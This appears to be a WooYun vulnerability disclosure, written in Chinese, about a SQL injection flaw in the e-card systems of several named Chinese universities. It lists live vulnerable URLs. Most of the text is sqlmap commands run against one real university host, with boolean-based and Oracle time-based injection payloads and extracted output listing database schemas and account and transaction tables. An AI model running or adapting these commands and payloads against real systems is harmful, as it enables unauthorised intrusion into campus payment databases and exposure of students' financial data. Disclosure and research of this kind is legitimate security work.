WooYun.org

测试了几个学校，如，南开大学，山东大学，鲁东大学等等，都有存在，
http://ecard.nankai.edu.cn/getfjnr.action?fjid=8ae48a8a254e6f8101254ea07c2d0003
http://ecard.sdu.edu.cn/getfjnr.action?fjid=53d6b6923cff8518013f5f2b4b59000b
http://ecard.ldu.edu.cn/getfjnr.action?fjid=4a42b0f33381c4f90133d498614e0009
使用sqlmap跑一下，
$ ./sqlmap.py -u http://ecard.ldu.edu.cn/getfjnr.action?fjid=4a42b0f33381c4f90133d498614e0009 --dbs --threads=10
---
Place: GET
Parameter: fbxxid
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: fbxxid=4a42b0f33606058601360b0eac3e0001' AND 5509=5509 AND 'wHAE'='wHAE
Type: AND/OR time-based blind
Title: Oracle AND time-based blind
Payload: fbxxid=4a42b0f33606058601360b0eac3e0001' AND 5921=DBMS_PIPE.RECEIVE_MESSAGE(CHR(113)||CHR(86)||CHR(119)||CHR(81),5) AND 'MIyn'='MIyn
---
[10:05:35] [INFO] the back-end DBMS is Oracle
web application technology: JSP
back-end DBMS: Oracle
[10:25:12] [WARNING] schema names are going to be used on Oracle for enumeration as the counterpart to database names on other DBMSes
[10:25:12] [INFO] fetching database (schema) names
[10:25:12] [INFO] fetching number of databases
[10:25:12] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[10:25:12] [INFO] retrieved:
[10:25:16] [INFO] heuristics detected web page charset 'ISO-8859-2'
16
[10:26:33] [INFO] retrieved: CTXSYS
[10:31:52] [INFO] retrieved: DBSNMP
[10:38:03] [INFO] retrieved: DMSYS
[10:43:20] [INFO] retrieved: EXFSYS
[10:48:51] [INFO] retrieved: IDDBUSER
[10:56:14] [INFO] retrieved: MDSYS
[11:01:27] [INFO] retrieved: OLAPSYS
[11:09:45] [INFO] retrieved: ORDSYS
[11:17:23] [INFO] retrieved: OUTLN
[11:23:48] [INFO] retrieved: SCHOOL
[11:29:42] [INFO] retrieved: SYS
[11:32:43] [INFO] retrieved: SYSMAN
[11:38:29] [INFO] retrieved: SYSTEM
[11:44:00] [INFO] retrieved: TSMSYS
[11:50:12] [INFO] retrieved: WMSYS
[11:55:51] [INFO] retrieved: XDB
available databases [16]:
[*] CTXSYS
[*] DBSNMP
[*] DMSYS
[*] EXFSYS
[*] IDDBUSER
[*] MDSYS
[*] OLAPSYS
[*] ORDSYS
[*] OUTLN
[*] SCHOOL
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] TSMSYS
[*] WMSYS
[*] XDB
$ ./sqlmap.py -u http://ecard.ldu.edu.cn/getfjnr.action?fjid=4a42b0f33381c4f90133d498614e0009 -D SCHOOL --tables --threads=10
---
Place: GET
Parameter: fjid
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: fjid=4a42b0f33381c4f90133d498614e0009' AND 5975=5975 AND 'wecX'='wecX
---
[12:00:50] [INFO] the back-end DBMS is Oracle
back-end DBMS: Oracle
[12:00:50] [INFO] fetching tables for database: 'SCHOOL'
[12:00:50] [INFO] fetching number of tables for database 'SCHOOL'
[12:00:50] [INFO] retrieved:
[12:00:54] [INFO] heuristics detected web page charset 'ISO-8859-2'
112
[12:02:36] [INFO] retrieving the length of query output
[12:02:36] [INFO] retrieved: 10
[12:06:06] [INFO] retrieved: IBIB"__HJH 9/10 (90%)
[12:06:41] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the request
[12:06:41] [WARNING] if the problem persists please try to lower the number of used threads (option '--threads')
[12:06:56] [INFO] retrieved: IBIB"_PHJH
[12:06:56] [INFO] retrieving the length of query output
[12:06:56] [INFO] retrieved: 12
[12:11:07] [INFO] retrieved: BATEWADRDBRB
[12:11:07] [INFO] retrieving the length of query output
[12:11:07] [INFO] retrieved: 13
[12:16:33] [INFO] retrieved: FARBRAXXPBDQX
[12:16:33] [INFO] retrieving the length of query output
[12:16:33] [INFO] retrieved: 13
[12:22:19] [INFO] retrieved: BAREWAYTLI@@K
[12:22:19] [INFO] retrieving the length of query output
[12:22:19] [INFO] retrieved: 11
[12:25:57] [INFO] retrieved: GATETAX_NOS
[12:25:57] [INFO] retrieving the length of query output
[12:25:57] [INFO] retrieved: 5
[12:29:07] [INFO] retrieved: GTRJN
[12:29:07] [INFO] retrieving the length of query output
[12:29:07] [INFO] retrieved: 10
[12:32:57] [INFO] retrieved: HISACCOUNT
[12:32:57] [INFO] retrieving the length of query output
[12:32:57] [INFO] retrieved: 13
[12:38:01] [INFO] retrieved: MLOG$_ACCOUNT
[12:38:01] [INFO] retrieving the length of query output
[12:38:01] [INFO] retrieved: 13
[12:42:20] [INFO] retrieved: MLOG$_MERCACC
[12:42:20] [INFO] retrieving the length of query output
[12:42:20] [INFO] retrieved: 8
[12:46:47] [INFO] retrieved: _PE_INF_ 5/8 (63%)
[12:47:53] [INFO] retrieved: OPENINFO
[12:47:53] [INFO] retrieving the length of query output
[12:47:53] [INFO] retrieved: 8
[12:52:09] [INFO] retrieved: OPERATOR
[12:52:09] [INFO] retrieving the length of query output
[12:52:09] [INFO] retrieved: 15
[12:57:49] [INFO] retrieved: OPERFEEITEM_OLD
[12:57:49] [INFO] retrieving the length of query output
[12:57:49] [INFO] retrieved: 7
[13:01:26] [INFO] retrieved: OPERLOG
[13:01:26] [INFO] retrieving the length of query output
[13:01:26] [INFO] retrieved: 8
[13:04:46] [INFO] retrieved: OPERPART
[13:04:46] [INFO] retrieving the length of query output
[13:04:46] [INFO] retrieved: 7
[13:07:20] [INFO] retrieved: HISTRJN
[13:07:20] [INFO] retrieving the length of query output
[13:07:20] [INFO] retrieved: 5
[13:10:15] [INFO] retrieved: UTRJN
[13:10:15] [INFO] retrieving the length of query output
[13:10:15] [INFO] retrieved: 13
[13:15:51] [INFO] retrieved: WEBTRJNREPORT
[13:15:51] [INFO] retrieving the length of query output
[13:15:51] [INFO] retrieved: 18
[13:21:32] [INFO] retrieved: WEB_COMPARE_RESULT
[13:21:32] [INFO] retrieving the length of query output
[13:21:32] [INFO] retrieved: 9
[13:24:36] [INFO] retrieved: _EB_FB___ 4/9 (44%)
[13:24:41] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the request
[13:26:24] [INFO] retrieved: WEB_FBXXB
[13:26:24] [INFO] retrieving the length of query output
[13:26:24] [INFO] retrieved: 8
[13:29:12] [INFO] retrieved: WEB_FTPB
[13:29:12] [INFO] retrieving the length of query output
[13:29:12] [INFO] retrieved: 8
[13:31:46] [INFO] retrieved: WEB____J 4/8 (50%)
[13:31:56] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the request
[13:32:14] [INFO] retrieved: WEB_XXFJ
[13:32:14] [INFO] retrieving the length of query output
[13:32:14] [INFO] retrieved: 8
[13:34:45] [INFO] retrieved: WEB_XXLM
[13:34:45] [INFO] retrieving the length of query output
[13:34:45] [INFO] retrieved: 12
[13:37:40] [INFO] retrieved: W_OP_MERCACC
[13:37:40] [INFO] retrieving the length of query output
[13:37:40] [INFO] retrieved: 8
[13:40:29] [INFO] retrieved: HISGTRJN
[13:40:29] [INFO] retrieving the length of query output
[13:40:29] [INFO] retrieved: 14
[13:44:15] [INFO] retrieved: W_OP_ORDERINFO
[13:44:15] [INFO] retrieving the length of query output
[13:44:15] [INFO] retrieved: 15
[13:47:41] [INFO] retrieved: W_THIRD_MESSAGE
[13:47:41] [INFO] retrieving the length of query output
[13:47:41] [INFO] retrieved: 5
[13:50:10] [INFO] retrieved: XFZKL
[13:50:10] [INFO] retrieving the length of query output
[13:50:10] [INFO] retrieved: 4
[13:50:55] [INFO] retrieved: ____
[13:51:37] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the request
[13:52:45] [INFO] retrieved: ZBHD
[13:52:45] [INFO] retrieving the length of query output
[13:52:45] [INFO] retrieved: 2
[13:55:18] [INFO] retrieved: ZH
[13:55:18] [INFO] retrieving the length of query output
[13:55:18] [INFO] retrieved: 6
[13:57:46] [INFO] retrieved: ZKZYDY
[13:57:46] [INFO] retrieving the length of query output
[13:57:46] [INFO] retrieved: 6
[13:58:54] [INFO] retrieved: ______
[13:59:48] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the request
[14:00:35] [INFO] retrieved: ZXYHKK
[14:00:35] [INFO] retrieving the length of query output
[14:00:35] [INFO] retrieved: 4
[14:02:19] [INFO] retrieved: KMRJ
[14:02:19] [INFO] retrieving the length of query output
[14:02:19] [INFO] retrieved: 3
[14:04:36] [INFO] retrieved: LOG
[14:04:36] [INFO] retrieving the length of query output
[14:04:36] [INFO] retrieved: 5
[14:06:45] [INFO] retrieved: LSHZB
[14:06:45] [INFO] retrieving the length of query output
[14:06:45] [INFO] retrieved: 7
[14:08:45] [INFO] retrieved: MERCACC
[14:08:45] [INFO] retrieving the length of query output
[14:08:45] [INFO] retrieved: 7
[14:10:52] [INFO] retrieved: MESSAGE
[14:10:52] [INFO] retrieving the length of query output
[14:10:52] [INFO] retrieved: 8
[14:13:13] [INFO] retrieved: MHISTRJN
[14:13:13] [INFO] retrieving the length of query output
[14:13:13] [INFO] retrieved: 5
[14:15:16] [INFO] retrieved: NTRJN
[14:15:16] [INFO] retrieving the length of query output
[14:15:16] [INFO] retrieved: 11
[14:17:56] [INFO] retrieved: OPERFEEITEM
[14:17:56] [INFO] retrieving the length of query output
[14:17:56] [INFO] retrieved: 8
[14:20:17] [INFO] retrieved: OPERTEAM
[14:20:17] [INFO] retrieving the length of query output
[14:20:17] [INFO] retrieved: 11
[14:23:02] [INFO] retrieved: PURSECONFIG
[14:23:02] [INFO] retrieving the length of query output
[14:23:02] [INFO] retrieved: 4
[14:24:26] [INFO] retrieved: QQAA
...
表有点多，就没继续跑下去了